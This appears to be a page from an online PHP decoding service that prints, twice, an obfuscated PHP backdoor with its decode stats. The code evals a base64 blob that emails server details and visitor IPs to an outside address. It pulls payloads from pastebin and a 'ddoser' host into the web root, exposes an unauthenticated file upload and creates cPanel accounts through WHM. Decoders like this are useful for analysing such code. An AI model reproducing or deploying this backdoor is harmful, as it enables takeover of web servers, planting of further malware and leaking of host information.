Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $encoded = 'JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7DQokaXBfcmVtb3Rl..
Decoded Output download
<?php $encoded = 'JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7DQokaXBfcmVtb3RlID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokZnJvbV9zaGVsbGNvZGUgPSAnc2hlbGxAJy5nZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKS4nJzsNCiR0b19lbWFpbCA9ICdicmF6aWxvYnNjdXJlQGxpdmUuY29tJzsNCiRzZXJ2ZXJfbWFpbCA9ICIiLmdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10pLiIgIC0gIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIiI7DQokbGlua2NyID0gIkxpbms6ICIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10uIiAtIElQIEV4Y3V0aW5nOiAkaXBfcmVtb3RlIC0gVGltZTogJHRpbWVfc2hlbGwiOw0KJGhlYWRlciA9ICJGcm9tOiAkZnJvbV9zaGVsbGNvZGVcclxuUmVwbHktdG86ICRmcm9tX3NoZWxsY29kZSI7DQpAbWFpbCgkdG9fZW1haWwsICRzZXJ2ZXJfbWFpbCwgJGxpbmtjciwgJGhlYWRlcik7=='; eval(base64_decode($encoded)); function http_get($url){ $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } $check = $_SERVER['DOCUMENT_ROOT'] . "/up.php" ; $text = http_get('http://pastebin.com/raw/uUFM9h8Z'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ }else echo ""; $check0 = $_SERVER['DOCUMENT_ROOT'] . "/xx1.php" ; $text0 = http_get('http://pastebin.com/raw/3e7RmzMA'); $open0 = fopen($check0, 'w'); fwrite($open0, $text0); fclose($open0); if(file_exists($check0)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/up1.php" ; $text2 = http_get('http://pastebin.com/raw/dSucuQ7R'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check3=$_SERVER['DOCUMENT_ROOT'] . "/indexx.html" ; $text3 = http_get('http://ddoser.netii.net/'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); if(file_exists($check3)){ }else echo ""; $check5 = $_SERVER['DOCUMENT_ROOT'] . "/produtos.php" ; $text5 = http_get('http://pastebin.com/raw/dsxfw1qc'); $open5 = fopen($check5, 'w'); fwrite($open5, $text5); fclose($open5); if(file_exists($check5)){ }else echo ""; $check6 = $_SERVER['DOCUMENT_ROOT'] . "/produtos_new.php" ; $text6 = http_get('http://pastebin.com/raw/RKuW5f7u'); $open6 = fopen($check6, 'w'); fwrite($open6, $text6); fclose($open6); if(file_exists($check6)){ }else echo ""; $cwd = getcwd(); $Iraqe = $_GET['mr']; if($Iraqe == 'chmod'){ $filename = $_FILES['file']['name']; $filetmp = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='go' />
</form>"; if(move_uploaded_file($filetmp,$filename)=='1'){ echo 'Concluido ----> '.$filename; } } $whm_user = "ISI DENGAN USER WHM"; $whm_pass = "ISI DENGAN PASS WHM"; $whm_host = $_SERVER['HTTP_HOST']; function getVar($name, $def = '') { if (isset($_REQUEST[$name])) return $_REQUEST[$name]; else return $def; } if (!isset($user_domain)) { $user_domain = getVar('domain'); } if (!isset($user_name)) { $user_name = getVar('user'); } if (!isset($user_pass)) { $user_pass = getVar('password'); } if (!isset($user_plan)) { $user_plan = getVar('package'); } if (!isset($user_email)) { $user_email = getVar('email'); } if (!empty($user_name)) { $script = "http://{$whm_user}:{$whm_pass}@{$whm_host}:2086/scripts/wwwacct"; $params = "?plan={$user_plan}&domain={$user_domain}&username={$user_name}&password={$user_pass}&contactemail={$user_email}"; $result = file_get_contents($script.$params); echo "RESULT: " . $result; } else { $frm = <<<EOD
<html>
<head>
<title>cPanel Account Creator 2016</title>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
</head>
<body>
<style>
input { border: 1px solid black; }
</style>
<form method="post">
<h3>cPanel Account Creator</h3>
<table border="0">
<tr><td>Domain:</td><td><input name="domain" size="30"></td><td>Domain Tanpa http:// and [ www ]</td></tr>
<tr><td>Username:</td><td><input name="user" size="30"></td><td>Username cPanel Ente</td></tr>
<tr><td>Password:</td><td><input name="password" size="30"></td><td>Bebas [ Symbol, etc... ]</td></tr>
<tr><td></td><td><input type="hidden" name="package" size="30"value="ISI DENGAN PACKAGE WHM ENTE"></td><td></td></tr>
<tr><td>Contact Email:</td><td><input name="email" size="30"value="[email protected]"></td><td> Email </td></tr>
<tr><td colspan="3"><br /><input type="submit" value="INICIAR"></td></tr>
</table>
</form>
</body>
</html>
EOD;
echo $frm; } ?>Did this file decode correctly?
Original Code
<?php $encoded = 'JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7DQokaXBfcmVtb3RlID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokZnJvbV9zaGVsbGNvZGUgPSAnc2hlbGxAJy5nZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKS4nJzsNCiR0b19lbWFpbCA9ICdicmF6aWxvYnNjdXJlQGxpdmUuY29tJzsNCiRzZXJ2ZXJfbWFpbCA9ICIiLmdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10pLiIgIC0gIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIiI7DQokbGlua2NyID0gIkxpbms6ICIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10uIiAtIElQIEV4Y3V0aW5nOiAkaXBfcmVtb3RlIC0gVGltZTogJHRpbWVfc2hlbGwiOw0KJGhlYWRlciA9ICJGcm9tOiAkZnJvbV9zaGVsbGNvZGVcclxuUmVwbHktdG86ICRmcm9tX3NoZWxsY29kZSI7DQpAbWFpbCgkdG9fZW1haWwsICRzZXJ2ZXJfbWFpbCwgJGxpbmtjciwgJGhlYWRlcik7=='; eval(base64_decode($encoded)); function http_get($url){ $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } $check = $_SERVER['DOCUMENT_ROOT'] . "/up.php" ; $text = http_get('http://pastebin.com/raw/uUFM9h8Z'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ }else echo ""; $check0 = $_SERVER['DOCUMENT_ROOT'] . "/xx1.php" ; $text0 = http_get('http://pastebin.com/raw/3e7RmzMA'); $open0 = fopen($check0, 'w'); fwrite($open0, $text0); fclose($open0); if(file_exists($check0)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/up1.php" ; $text2 = http_get('http://pastebin.com/raw/dSucuQ7R'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check3=$_SERVER['DOCUMENT_ROOT'] . "/indexx.html" ; $text3 = http_get('http://ddoser.netii.net/'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); if(file_exists($check3)){ }else echo ""; $check5 = $_SERVER['DOCUMENT_ROOT'] . "/produtos.php" ; $text5 = http_get('http://pastebin.com/raw/dsxfw1qc'); $open5 = fopen($check5, 'w'); fwrite($open5, $text5); fclose($open5); if(file_exists($check5)){ }else echo ""; $check6 = $_SERVER['DOCUMENT_ROOT'] . "/produtos_new.php" ; $text6 = http_get('http://pastebin.com/raw/RKuW5f7u'); $open6 = fopen($check6, 'w'); fwrite($open6, $text6); fclose($open6); if(file_exists($check6)){ }else echo ""; $cwd = getcwd(); $Iraqe = $_GET['mr']; if($Iraqe == 'chmod'){ $filename = $_FILES['file']['name']; $filetmp = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='go' />
</form>"; if(move_uploaded_file($filetmp,$filename)=='1'){ echo 'Concluido ----> '.$filename; } } $whm_user = "ISI DENGAN USER WHM"; $whm_pass = "ISI DENGAN PASS WHM"; $whm_host = $_SERVER['HTTP_HOST']; function getVar($name, $def = '') { if (isset($_REQUEST[$name])) return $_REQUEST[$name]; else return $def; } if (!isset($user_domain)) { $user_domain = getVar('domain'); } if (!isset($user_name)) { $user_name = getVar('user'); } if (!isset($user_pass)) { $user_pass = getVar('password'); } if (!isset($user_plan)) { $user_plan = getVar('package'); } if (!isset($user_email)) { $user_email = getVar('email'); } if (!empty($user_name)) { $script = "http://{$whm_user}:{$whm_pass}@{$whm_host}:2086/scripts/wwwacct"; $params = "?plan={$user_plan}&domain={$user_domain}&username={$user_name}&password={$user_pass}&contactemail={$user_email}"; $result = file_get_contents($script.$params); echo "RESULT: " . $result; } else { $frm = <<<EOD
<html>
<head>
<title>cPanel Account Creator 2016</title>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
</head>
<body>
<style>
input { border: 1px solid black; }
</style>
<form method="post">
<h3>cPanel Account Creator</h3>
<table border="0">
<tr><td>Domain:</td><td><input name="domain" size="30"></td><td>Domain Tanpa http:// and [ www ]</td></tr>
<tr><td>Username:</td><td><input name="user" size="30"></td><td>Username cPanel Ente</td></tr>
<tr><td>Password:</td><td><input name="password" size="30"></td><td>Bebas [ Symbol, etc... ]</td></tr>
<tr><td></td><td><input type="hidden" name="package" size="30"value="ISI DENGAN PACKAGE WHM ENTE"></td><td></td></tr>
<tr><td>Contact Email:</td><td><input name="email" size="30"value="[email protected]"></td><td> Email </td></tr>
<tr><td colspan="3"><br /><input type="submit" value="INICIAR"></td></tr>
</table>
</form>
</body>
</html>
EOD;
echo $frm; } ?>Function Calls
| None |
Stats
| MD5 | 20101981391605c0ebe64dff6b03534e |
| Eval Count | 0 |
| Decode Time | 96 ms |